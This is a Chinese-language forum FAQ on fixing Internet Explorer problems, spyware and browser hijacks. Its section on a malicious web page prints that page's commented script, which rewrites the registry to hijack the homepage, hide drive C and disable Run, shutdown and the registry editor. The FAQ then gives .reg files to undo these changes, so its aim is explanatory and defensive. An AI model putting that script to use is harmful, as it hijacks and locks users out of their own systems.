IE常见问题集
希望這篇文章能夠對IE用戶有所幫助,其內容都是根據本人的使用經驗和在新聞組中遇到的用戶所反饋的問題分析整理而成(部分內容整理自微軟Windows創新日課件),所以難免有疏漏之處,歡迎各位加以補充。
一 般來說Internet Explorer瀏覽器自身出現故障的情況比較少,大多數故障都是因為系統中存在的流氓軟件和第三方控件(ActiveX)、瀏覽器幫助程序對象 (BHO)所造成的。惡意廣告軟件(Adware)、間諜軟件(Spyware)、惡意共享軟件(Malicious shareware)都屬于流氓軟件的范疇。此類程序通常都有一個共同的特點,那就是在用戶毫不知情的情況下被安裝到系統中,不易被察覺且不能被 輕易找到和卸載,甚至根本就沒有提供卸載程序,它們不但會使IE或系統出現各種莫名奇妙的故障,更令人深惡痛絕的是還會偷偷記錄用戶的操作記錄和使用習慣 并將其發送到相關廠商或個人(也就是指我們常說的行為記錄),從而造成用戶隱私被泄漏。所以,建議大家使用工具將它們從系統中“請出去”,推薦使用以下幾 款反間諜軟件查殺(建議斷網后在安全模式中掃描系統):
1、HiJackThis
下載地址:http://www.hijackthis.de/en
2、Windows Defender Beta 2(原Microsoft Windows AntiSpyware)
下載地址:
http://www.microsoft.com/athome/secu...e/default.mspx
3、CWShredder
下載地址:http://www.trendmicro.com/cwshredder/
4、Ad-Aware
下載地址:http://www.lavasoft.de/ms/index.htm
5、eTrust PestPatrol Anti-Spyware
下載地址:http://www.ca.com/products/pestpatrol
6、Spybot Search and Destroy
下載地址:http://www.safer-networking.org/microsoft.en.html
相關信息您可以參考以下KB:
微軟官方網站中關于間諜軟件信息的頁面
http://www.microsoft.com/china/athom...e/default.mspx
怎樣對付間諜軟件和其他有害的軟件
http://www.microsoft.com/china/athom...ywarewhat.mspx
幫助識別欺騙性(冒牌)網站和惡意超鏈接及進行自我防護的步驟
http://support.microsoft.com/default.aspx?scid=kb;[ln];833786&spid=807&sid=global
訪問某些Web站點時顯示新窗口
http://support.microsoft.com/default...807&sid=global
欺騙性軟件可能會使計算機出現莫名其妙的問題
http://support.microsoft.com/default...b;zh-cn;827315
主頁設置被意外更改或者無法更改主頁設置
http://support.microsoft.com/default...807&sid=global
安裝SP2后及更新了最新補丁以后Internet Explorer常見的一些問題
當您的系統安裝了XP SP2補丁包后,Internet Explorer也隨之更新為SP2,并且其安全性有所提升,IE6 SP2在安全方面主要有以下特性:
1、鎖定本機域(Local Machine Zone)
2、更加嚴格的Binary Behavior控制
3、默認不允許區域提升
4、默認會阻止沒有經過簽名的ActiveX Controls
5、嚴格的MIME信息檢查
6、默認會阻止彈出窗口
案例一:Windows XP SP2系統中IE不能正確顯示網頁內容
故障現象:當用戶點擊一些文件的鏈接時,比如一個視頻文件(WMV)或者一個圖片文件(JPG),IE并沒有提示下載框,有的時候甚至將這些文件顯示成純文本的狀態,從用戶的角度去看,就是顯示成亂碼。
故障原因:WEB管理員設置了錯誤的Content-Type,IE在SP2中進行了更加嚴格的MIME檢查,如果IE發現Server所指定的Content-Type與擴展名以及MIME Sniff的結果不符合時,那么IE就會拒絕下載文件。
解決方案:需要修改服務器頁面上的Content-Type或者通過修改客戶端注冊表來弱化IE的MIME檢查(不推薦)。
案例二:安裝最新補丁以后所有包含ActiveX的網頁工作不正常
1、故障現象:安裝MS05-052補丁后,很多包含ActiveX的網頁工作不正常。
故障原因:因為MS05-052補丁加強了IE的安全性,它引入了更多的安全檢查,其中一項就是在COM對象可以在IE中運行之前,IE會檢查ObjectSafey接口中是否存在位于Internet區域的ActiveX控件,這個新功能很大程度上保護了客戶端的安全。
解決方案:要想從根本上解決該問題,您需要對ActiveX重新編譯,并將控件標識為安全。相關方法您可以參考以下兩篇KB:
http://support.microsoft.com/kb/216434
http://support.microsoft.com/kb/161873
臨時解決方案:可以通過添加注冊表方式將ActiveX控件標記為可安全執行腳本和可安全初始化,相關信息您可以參考以下KB:http://support.microsoft.com/kb/909738
2、故障現象:安裝了MS05-051以后,出現下列癥狀:
-Windows安裝程序、Windows防火墻、COM+服務可能不會啟動
-網絡連接文件夾為空
-Windows更新網站可能會錯誤的建議您更改IE中的“持續使用用戶數據”設置
-在IIS上運行的ActiveX Server Pages(ASP)頁返回“HTTP 500”信息
-Microsoft組件服務Microsoft管理控制臺(MMC)樹中的“計算機”節點無法展開
-經過身份驗證的用戶無法登陸,而且在用戶應用十月份的安全更新后出現空白屏幕
故障原因:如果有任何COM/COM+應用程序無法訪問COM+編錄文件(%Windir%\registration\*.CLB)就可能會出現此問 題,應用程序不能訪問COM+編錄文件是因為這些文件上的權限巳被更改,不再是原來的默認設置,在安裝MS05-051補丁之前,不要求提供對COM+編 錄的顯示權限,但安裝后會檢查權限。
解決方案:請確保Admin、System對%Windir%\registration\有完全控制權限,并確保Everyone對%Windir%\registration\有讀權限。
Internet Explorer的常規排錯步驟
步驟一:如果是IE本身出現錯誤,其原因多數都是因為某些屬于IE的DLL、OCX組件注冊不正確或是在注冊表中的注冊信息產生混亂、損壞、丟失造成的,您可以按如下幾種方法重新注冊IE的組件:
方法一:在“開始/運行”中輸入:"%Program Files%\Internet Explorer\iexplore.exe" /rereg(包含引號) 后點擊確定即可。
方法二:打開記事本輸入以下內容:
For %% i in (c:\windows\system32\*.dll) Do regsvr32.exe /s %%i
For %% i in (c:\windows\system32\*.ocx) Do regsvr32.exe /s %%i
然后將其保存為reg.bat批處理文件,運行它就可以修復一些因動態鏈接庫失效所造成的問題。
方法三:請逐個重新注冊以下列出的與IE有關的重要DLL(動態鏈接庫)文件:
scrrun.dll msxml.dll mshtml.dll jscript.dll Urlmon.dll shdocvw.dll
browseui.dll softpub.dll wintrust.dll dssenh.dll rsaenh.dll gpkcsp.dll
sccbase.dll slbcsp.dll cryptdlg.dll actxprxy.dll shell32.dll oleaut32.dll
注冊方法:在“開始/運行”中鍵入“regsvr32 DLL文件”(注意:regsvr32命令與DLL文件之間有空格且注冊時不包括引號)
如果注冊時發現某個文件找不到,那么您可以從http://www.dll-files.com搜索下載...��件即可。
相關信息您可以參考以下內容:
單擊鏈接后無法打開新的 Internet Explorer 窗口或沒有任何反應
http://support.microsoft.com/?kbid=281679
步驟二:清除所有的IE緩存文件、COOKIE、歷史記錄、自動完成表單和密碼、SSL狀態
1)進入IE中的“Internet選項”“常規”頁面并清除歷史記錄、刪除COOKIE、刪除文件—刪除所有脫機內容。
2)進入IE中的“Internet選項”“隱私”頁面檢查級別是否被設置過高,如果是請降低級別為中或更低。
3)進入IE中的“Internet選項”“內容”選項點擊“清空SSL狀態”并進入“自動完成”選項,點擊“清除表單”“清除密碼”確定后退出。
您也可以到以下地址下載一款名為“ClearIECache”的工具來刪除所有的IE緩存文件、COOKIE、歷史記錄:
http://www.microsoft.com/downloads/d...displaylang=en
步驟三:請將Internet Explorer中的所有設置重新設為默認設置。
步驟四:禁用或刪除第三方控件
如果您的系統為XP SP2,那么可以通過IE中的“管理加載項”功能禁用它們,如果為其它系統則可以通過取消選中Internet選項“高級”頁“瀏覽”欄下的“啟用第三方 瀏覽器擴展(需重啟)”前的復選框來禁用第三方控件或者進入“Internet選項”“常規”頁面,單擊“Internet臨時文件”中的“設置”,再單 擊“查看對象”來打開“Downloaded Program Files”文件夾,在其中的控件文件上點鼠標反鍵并選擇“刪除”來將第三方控件刪除掉。當然,您也可以使用工具來完成禁用和刪除第三方控件的操作,例 如:upiea(不限于這一種)下載地址:http://www.lumix.cn/upiea/
相關信息您可以參考以下KB:
如何禁用第三方工具帶區和瀏覽器幫助對象
http://support.microsoft.com/kb/298931/zh-cn
如何在Windows中刪除ActiveX控件
http://support.microsoft.com/kb/154850/zh-cn
如何在Windows XP Service Pack 2中管理Internet Explorer附件http://support.microsoft.com/?scid=kb;zh-cn;883256
了解和排除Internet Explorer中不可恢復的錯誤(故障)
http://support.microsoft.com/?scid=k...id=807&sid=186
如何重新安裝或修復Windows XP中的Internet Explorer和Outlook Express
http://support.microsoft.com/default...b;zh-cn;318378
http://bbs.mscommunity.com/forums/Sh...px?PostID=5852
關于IE腳本錯誤的問題
一般來說,IE出現腳本錯誤的原因大概有以下幾種:
-網頁的HTML源代碼中有問題。
-您的計算機或網絡上阻止了活動腳本、ActiveX 控件或Java小程序。Internet Explorer或另外一種程序(如防病毒程序或防火墻)可以配置為阻止活動腳本、ActiveX 控件或Java小程序。
-防病毒軟件配置為掃描您的“臨時Internet文件”或“已下載的程序文件”文件夾。
-您計算機上的腳本引擎損壞或過時。
-您計算機上的Internet相關文件夾損壞。
-您的視頻卡驅動程序已損壞或者已過時。
-您計算機上的DirectX組件損壞或過時。
關于如何排除Internet Explorer中的腳本錯誤,您可以參考這篇KB:
http://support.microsoft.com/kb/308260/zh-cn
您也可以嘗試安裝最新版本的JAVA程序來解決腳本錯誤
下載地址:http://www.java.com/zh_CN/
微軟WINDOWS SCRIPCHS 5.6
下載地址:http://download.microsoft.com/downlo...e/scripchs.exe
推薦幾款除錯工具
如果您具備一定的動手能力和系統知識,那么也可以嘗試一下以下幾種常用的Windows/Internet Explorer除錯工具:
1、[Process Explorer]
下載地址:http://www.sysinternals.com/Utilitie...sExplorer.html
2、[Registry Monitor]
下載地址:http://www.sysinternals.com/utilities/regmon.html
3、[File Monitor]
下載地址:http://www.sysinternals.com/Utilities/Filemon.html
4、[TDIMon]
下載地址:http://www.sysinternals.com/utilities/tdimon.html
5、[Advanced Registry Tracer]
下載地址:http://www.elcomsoft.com/art.html
6、Microsoft Product Support's Reporting Tools(Microsoft配置捕獲實用工具)
下載地址:http://www.microsoft.com/downloads/d...displaylang=en
相關信息:
Microsoft配置捕獲實用工具(MPS_REPORTS)概述:
http://support.microsoft.com/kb/818742
最后,想提醒各位IE用戶,當您在使用IE的過程中遇到問題時,可以先使用關鍵字在微軟的官方知識庫(KB)中查找解決方案
如何使用關鍵字和查詢詞查詢Microsoft知識庫:
http://support.microsoft.com/?scid=kb;zh-cn;242450
Microsoft Internet Explorer產品支持中心頁面:
http://support.microsoft.com/ph/807
--------------------------------------------------------------------------------
如有疑問和問題待解決,請跟帖提出,我們會盡力回答。帖子主題與提問無關者直接刪除。
例:
Q:我的IE6在登錄網站時總是顯示上次所訪問的內容,不能自動更新,需要手動刷新才行。用“系統還原”或“重裝IE”均無效。以前也出現過多次此種情況,最后只能重裝系統。請問大俠還有無更好辦法?
A:請您先清空IE的所有緩存文件,包括cookie、歷史記錄和所有脫機內容,然后再重新登陸該網站,或者請進入“Internet選項—常規”頁面, 單擊“Internet臨時文件”欄中的“設置”按鈕,在“檢查所存網頁的較新版本”欄中請選中“自動”或“每次訪問此頁時檢查”復選框即可。
IE自動關閉所有窗口
--------------------------------------------------------------------------------
因所有IE窗口都使用同一個“IEXPLORE.EXE”進程,所以該情況可能是某窗口非法操作造成的。
打開注冊表進入[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Explorer]鍵值,新建“BrowseNewProcess”子鍵,其值設為“Yes”,分離每個瀏覽窗口進程,重啟生效。
如果是由于IE出現錯誤被關閉的,說明IE核心中某些動態鏈接庫中DLL文件在注冊表中的相關內容(/注冊信息)丟失或出錯引起的。一般是因為安裝了某些軟件導致的錯誤。
“運行”---“regsvr32 actxprxy.dll”和“regsvr32 shdocvw.dll”(注冊DLL文件)
“ mshtml.dll、 urlmon.dll、 msjava.dll 、browseui.dll、 oleaut32.dll 、shell32.dll”(修復安裝或升級IE)
防范故障的發生
1)經常清理“系統盤:\Documents and Settings\用戶名\Local Settings\Temporary Internet Files”文件夾里面的內容,特別是Cookies;
2)備份IE注冊表鍵值,直接刪除原主鍵后導入,可有效解決無法打開鏈接或二層鏈接故障;
3)系統文件核心受損時重裝最直接。
瀏覽網頁注冊表被修改之迷及解決辦法
--------------------------------------------------------------------------------
一、注冊表被修改的原因及解決辦法
其實,該惡意網頁是含有有害代碼的ActiveX網頁文件,這些廣告信息的出現是因為瀏覽者的注冊表被惡意更改的結果。
1、IE默認連接首頁被修改
IE瀏覽器上方的標題欄被改成“歡迎訪問******網站”的樣式,這是最常見的篡改手段,受害者眾多。
受到更改的注冊表項目為:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
通過修改“Start Page”的鍵值,來達到修改瀏覽者IE默認連接首頁的目的,如瀏覽“*****”就會將你的IE默認連接首頁修改為http: //ppw.****.com ”,即便是出于給自己的主頁做廣告的目的,也顯得太霸道了一些,這也是這類網頁惹人厭惡的原因。
解決辦法:
A.注冊表法:
①在Windows啟動后,點擊“開始”→“運行”菜單項,在“打開”欄中鍵入regedit,然后按“確定”鍵;
②展開注冊表到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分窗口中找到串值“Start Page”雙擊 ,將Start Page的鍵值改為“about :blank”即可;
③同理,展開注冊表到HKEY_CURRENT_USER\Software\MicrosoftInternet Explorer\Main
在右半部分窗口中找到串值“Start Page”,然后按②中所述方法處理。
④退出注冊表編輯器,重新啟動計算機,一切OK了!
B.特殊例子:當IE的起始頁變成了某些網址后,就算你通過選項設置修改好了,重啟以后又會變成他們的網址啦,十分的難纏。其實他們是在你機器里加了一個自運行程序,它會在系統啟動時將你的IE起始頁設成他們的網站。
解決辦法:
運行注冊表編輯器regedit.exe,然后依次展開HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\Current Version\Run主鍵,然后將其下的registry.exe子鍵刪除,然后刪除自運行程序c:\ProgramFiles\ registry.exe,最后從IE選項中重新設置起始頁就好了。
2、篡改IE的默認頁
有些IE被改了起始頁后,即使設置了“使用默認頁”仍然無效,這是因為IE起始頁的默認頁也被篡改啦。具體說來就是以下注冊表項被修改: HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL“Default_Page_URL”這個子鍵的鍵值即起始頁的默認頁。
解決辦法:
A.運行注冊表編輯器,然后展開上述子鍵,將“Default_Page_UR”子鍵的鍵值中的那些篡改網站的網址改掉就好了,或者設置為IE的默認值。
B.msconfig 有的還是將程序寫入硬盤中,重啟計算機后 首頁設置又被改了回去,這時可使用“系統配置實用程序”來解決。開始-運行,鍵入msconfig點擊“確定”,在彈出的窗口中切換到“啟動”選項卡,禁用可疑程序啟動項。
3、修改IE瀏覽器缺省主頁,并且鎖定設置項,禁止用戶更改回來。主要是修改了注冊表中IE設置的下面這些鍵值(DWORD值為1時為不可選):
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel] "Settings"=dword:1
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel] "Links"=dword:1
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]"SecAddSites"=dword:1
解決辦法:
將上面這些DWORD值改為“0”即可恢復功能。
4、IE的默認首頁灰色按扭不可選
這是由于注冊表HKEY_USERS\DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel下的DWORD值“homepage”的鍵值被修改的緣故。原來的鍵值為“0”,被修改為“1”(即為灰色不可選狀態)。
解決辦法:
將“homepage”的鍵值改為“0”即可。
5、IE標題欄被修改
在系統默認狀態下,是由應用程序本身來提供標題欄的信息,但也允許用戶自行在上述注冊表項目中填加信息,而一些惡意的網站正是利用了這一點來得逞的:它們將串值Window Title下的鍵值改為其網站名或更多的廣告信息,從而達到改變瀏覽者IE標題欄的目的。
具體說來受到更改的注冊表項目為:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title
解決辦法:
①在Windows啟動后,點擊“開始”→“運行”菜單項,在“打開”欄中鍵入regedit,然后按“確定”鍵;
②展開注冊表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分窗口中找到串值“Window Title”,將該串值刪除即可,或將Window Title的鍵值改為“IE瀏覽器”等你喜歡的名字;
③同理,展開注冊表到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main然后按②中所述方法處理。
④退出注冊表編輯器,重新啟動計算機,運行IE,你會發現困擾你的問題解決了!
6、IE右鍵菜單被修改
受到修改的注冊表項目為:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt下被新建了網頁的廣告信息,并由此在IE右鍵菜單中出現!
解決辦法:
打開注冊標編輯器,找到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt刪除相關的廣告條文即可,注意不要把下載軟件FlashGet和Netants也刪除掉啊,這兩個可是“正常”的呀,除 非你不想在IE的右鍵菜單中見到它們。
7、IE默認搜索引擎被修改
在IE瀏覽器的工具欄中有一個搜索引擎的工具按鈕,可以實現網絡搜索,被篡改后只要點擊那個搜索工具按鈕就會鏈接到那個篡改網站。
出現這種現象的原因是以下注冊表被修改:
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant
解決辦法:
運行注冊表編輯器,依次展開上述子鍵,將“CustomizeSearch”和“SearchAssis tant”的鍵值改為某個搜索引擎的網址即可。
8、系統啟動時彈出對話框
受到更改的注冊表項目為: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon在其下 被建立了字符串“LegalNoticeCaption”和“LegalNoticeText”,其中“LegalNoticeCaption”是提示框 的標題,“LegalNoticeText”是提示框的文本內容。由于它們的存在,就使得我們每次登陸到Windwos桌面前都出現一個提示窗口,顯示那 些網頁的廣告信息!你瞧,多討厭啊!
解決辦法:
打開注冊表編輯器,找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Winlogo這一個主鍵,然后在右邊窗口中找到“LegalNoticeCaption”和 “LegalNoticeText”這兩個字符串,刪除這兩個字符串就可以解決在登陸時出現提示框的現象了。
9、瀏覽網頁注冊表被禁用
這是由于注冊表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\System下的DWORD值“DisableRegistryTools”被修改為“1”的緣故,將其鍵值恢復為“0”即可恢復注冊 表的使用。
解決辦法:
用記事本程序建立以REG為后綴名的文件,將下面這些內容復制在其中就可以了:
REGEDIT4[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]“DisableRegistryTools”=dword:00000000。
10、瀏覽網頁開始菜單被修改
這是最“狠”的一種,讓瀏覽者有生不如死的感覺。瀏覽后不僅有類似上面所說的那些癥狀,還會有以下更悲慘的遭遇:
進入該網頁會被:
1.修改開始菜單
1)禁止“關閉系統”
2)禁止“運行”
3)禁止“注銷”
2.隱藏C盤——你的C盤找不到了
3.禁止使用注冊表編輯器regedit
4.禁止使用DOS程序
5.使系統無法進入“實模式”
6.禁止運行任何程序
7.將IE瀏覽器的首頁改為http://www.findfeel.com/,收藏夾中也被加入該網址。
那么這些功能恐怖的功能是如何實現的呢?原來,該網頁是有人利用Java技術制作的含有有害代碼的ActiveX網頁文件。為讓更多的人了解其危害,我查看了其源代碼,將其主要部分列了出來,并加了詳細的注釋(文中有“注”字的部分是我加的注釋)。
注:下面代碼是將你的IE默認連接首頁改為http://www.findfeel.com/
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.findfeel.com/");
注:以下是該網頁修改受害者的注冊表項所用的招數
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 01, "REG_BINARY");
注:使受害者系統沒有“運行”項,這樣用戶就不能通過注冊表編輯器來修改該有害網頁對系統注冊表的修改。
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 01, "REG_BINARY");
注:使受害者系統沒有“關閉系統”項
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY");
注:使受害者系統沒有“注銷”項
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD");
注:使受害者系統沒有邏輯驅動器C
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\ Disabled","REG_BINARY");
注:禁止運行所有的DOS應用程序;
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\ \WinOldApp\\NoRealMode","REG_BINARY");
注:使系統不能啟動到“實模式”(傳統的DOS模式)下;
又注:進入該網頁,它還會修改以下的注冊表項,使WINDOWS系統登錄時顯示一個登錄窗口(在MicroSoft網絡用戶登錄之前)
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "嗚啦啦...");
注:這些代碼會使窗口的標題是“嗚啦啦…”
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "歡迎你!你這個超級無敵大白癡!《嗚啦啦...》故事開始了,按確定進入悲慘世界");
注:上面一行是會在窗口中顯示出來的文字
注:下面兩行代碼修改注冊表,使受害者所有的IE窗口都加上以下的標題:“嗚啦啦…”
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "嗚啦啦...");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "嗚啦啦...");
注:到上面一行為止,完成了對受害者的注冊表的所有修改!
注:下面代碼用來將其網頁增加到受害者的收藏夾中
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\
" + Net.UserName + "\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}
注:下面就是使其網頁加入到你的收藏夾的具體代碼
AddFavLnk(loc, "找到感覺www.findfeel.com", "http://www.findfeel.com");
由于代碼很簡單,又加了注釋,相信你已經看明白是怎么回事了。那么如果不小心進入該網頁,并且已經中招了該怎么辦呢?別急,下面給你列出了解決的辦法。
受害用戶的修復方法:
1:對于Win9x用戶,建議在電腦啟動時按F8鍵,選擇到MS-DOS方式下,使用Scanreg/restore命令來恢復以前備份的、正常的注冊表。
2:對于Win2000用戶,把以下內容copy下來,存為unlock.reg文件,選帶命令行的安全模式,用命令regedit unlock.reg導入,如何,重啟機器就OK了。
unlock.reg文件內容如下:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095
"NoRun"=hex:
"NoLogOff"=hex:
"NoDrives"=dword:00000000
"RestrictRun"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]"DisableRegistryTools"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]"DisableRegistryTools"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]"Disabled"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]"NoRealMode"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon]"LegalNoticeCaption"="""LegalNoticeText"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Window Title"="IE瀏覽器"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]"Window Title"="IE瀏覽器"
以上是比較常見的修改瀏覽者注冊表的現象,今天在瀏覽網頁時,無意中來到某個個人網站,又遇到了以前沒有碰到過的問題:
11、IE中鼠標右鍵失效
瀏覽網頁后在IE中鼠標右鍵失效,點擊右鍵沒有任何反應!
12、查看““源文件”菜單被禁用
在IE窗口中點擊“查看”→“源文件”,發現“源文件”菜單已經被禁用。
我在瀏覽網頁時并沒有注意到上面這兩個問題,因為當時正好朋友叫我有事,于是我就退出電腦了,晚上吃完飯開啟電腦連線上網,就發現IE中鼠標右鍵失效,“查看”菜單中的“源文件”被禁用。不能查看源文件也就罷了,但是無法使用鼠標右鍵真是太不方便了。得想個辦法!
找出最新版的超級兔子魔法設置試試吧,呀!不能解決!看來是個新問題,不過自己好歹也是“老革命”了,這點問題應該難不住我。于是到注冊表中一番搜尋,經過一番查找終于弄明白了問題的所在。
原來,惡意網頁修改了我的注冊表,具體的位置為:在注冊表HKEY_CURRENT_USER\Software\Policies\ Microsoft\Internet Explore下建立子鍵“Restrictions”,然后在“Restrictions”下面建立兩個DWORD值:“NoViewSource”和 “NoBrowserContextMenu”,并為這兩個DWORD值賦值為“1”。
在注冊表HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions下,將兩個DWORD值:“NoViewSource”和“NoBrowserContextMenu”的鍵 值都改為了“1”。
通過上面這些鍵值的修改就達到了在IE中使鼠標右鍵失效,使“查看”菜單中的“源文件”被禁用的目的。要向你說明的是第2點中提到的注冊表其實相當于第1點中提到的注冊表的分支,修改第1點中所說的注冊表鍵值,第2點中注冊表鍵值隨之改變。
解決辦法:
明白了道理,問題解決起來就容易多了,具體解決辦法為:將以下內容另存為后綴名為reg的注冊表文件,比方說unlock.reg,雙擊unlock.reg導入注冊表,不用重啟電腦,重新運行IE就會發現IE的功能恢復正常了。
REGEDIT4
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
\Restrictions]
“NoViewSource”=dword:00000000
"NoBrowserContextMenu"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer
\Restrictions]
“NoViewSource”=dword:00000000
“NoBrowserContextMenu”=dword:00000000
?
要特別注意的是,在你編制的注冊表文件unlock.reg中,“REGEDIT4”一定要大寫,并且它的后面一定要空一行,還有, “REGEDIT4”中的“4”和“T”之間一定不能有空格,否則將前功盡棄!許多朋友寫注冊表文件之所以不成功,就是因為沒有注意到上面所說的內容,這 回該注意點嘍。請注意如果你是Win2000或WinXP用戶,請將“REGEDIT4”改為Windows Registry Editor Version 5.00。
二、預防辦法
1、要避免中招,關鍵是不要輕易去一些自己并不了解的站點,特別是那些看上去美麗誘人的網址更不要貿然前往,否則吃虧的往往是你。
2、由于該類網頁是含有有害代碼的ActiveX網頁文件,因此在IE設置中將ActiveX插件和控件、Java腳本等全部禁止就可以避免中招。
具體方法是:在IE窗口中點擊“工具→Internet選項,在彈出的對話框中選擇“安全”標簽,再點擊“自定義級別”按鈕,就會彈出“安全設置”對 話框,把其中所有ActiveX插件和控件以及Java相關全部選擇“禁用”即可。不過,這樣做在以后的網頁瀏覽過程中可能會造成一些正常使用 ActiveX的網站無法瀏覽。唉,有利就有弊,你還是自己看著辦吧。
3、對于Windows98用戶,請打開C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP,把其中的 “ActiveXComponent.class”刪掉;對于WindowsMe用戶,請打開C:\WINDOWS\JAVA\Packages \5NZVFPF1.ZIP,把其中的“ActiveXComponent.class”刪掉。請放心,刪除這個組件不會影響到你正常瀏覽網頁的。
4、下載超級兔子魔法設置軟件后安裝,如果出現問題,可以用它來恢復。不過 “兔子”對于我們在上面所說的惡意網頁使得IE中鼠標右鍵失效,“查看”菜單中的 “源文件”被禁用這兩種現象無法恢復。
5、既然這類網頁是通過修改注冊表來破壞我們的系統,那么我們可以事先把注冊表加鎖:禁止修改注冊表,這樣就可以達到預防的目的。不過,自己要使用注冊表編輯器regedit.exe該怎么辦呢?因此我們還要在此前事先準備一把“鑰匙”,以便打開這把“鎖”!
加鎖方法如下:
(1)運行注冊表編輯器regedit.exe;
(2)展開注冊表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\System下,新建一個名為DisableRegistryTools的DWORD值,并將其值改為“1”,即可禁止使用注冊表編輯 器regedit.exe。
解鎖方法如下:
用記事本編輯一個任意名字的.reg文件,比如unlock.reg,內容如下: REGEDIT4[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies \System]“DisableRegistryTools”=dword:00000000存盤,你就有了一把解鎖的鑰匙了!如果要使用注冊表編輯 器,則雙擊unlock.reg即可。請注意如果你是Win2000或WinXP用戶,請將“REGEDIT4”寫為Windows RegistryEditor Version 5.00。
6、對Win2000用戶,還可以通過在Win2000下把服務里面的遠程注冊表操作服務“Remote Registry Service”禁用,來對付該類網頁。具體方法是:點擊“管理工具→服務→Remote Registry Service(允許遠程注冊表操作)”,將這一項禁用即可。
7、如果覺得手動修改注冊表太危險,可以下載如下reg文件,雙擊之可恢復被修改的注冊表。
8、雖然經過一番辛苦的勞動修改回了標題和默認連接首頁,但如果以后又不小心進入該站就又得麻煩一次。其實,你可以在IE中做一些設置以便永遠不進該 站點:打開IE,點擊“工具”→“Internet選項”→“內容”→“分級審查”,點“啟用”按鈕,會調出“分級審查”對話框,然后點擊“許可站點”標 簽,輸入不想去的網站網址,如輸入:http://***.****.com,按“從不”按鈕,再點擊“確定”即大功告成
IE瀏覽器防黑技巧
--------------------------------------------------------------------------------
1.管理好Cookie
在IE6.0中,打開“工具”→“Internet選項”→“隱私”對話框,這里設定了“阻止所有Cookie”、“高”、“中高”、“中”、 “低”、“接受所有Cookie”六個級別(默認為“中”),你只要拖動滑塊就可以方便地進行設定,而點擊下方的“編輯”按鈕,在“網站地址”中輸入特定 的網址,就可以將其設定為允許或拒絕它們使用Cookie。
2.禁用或限制使用Java程序及ActiveX控件
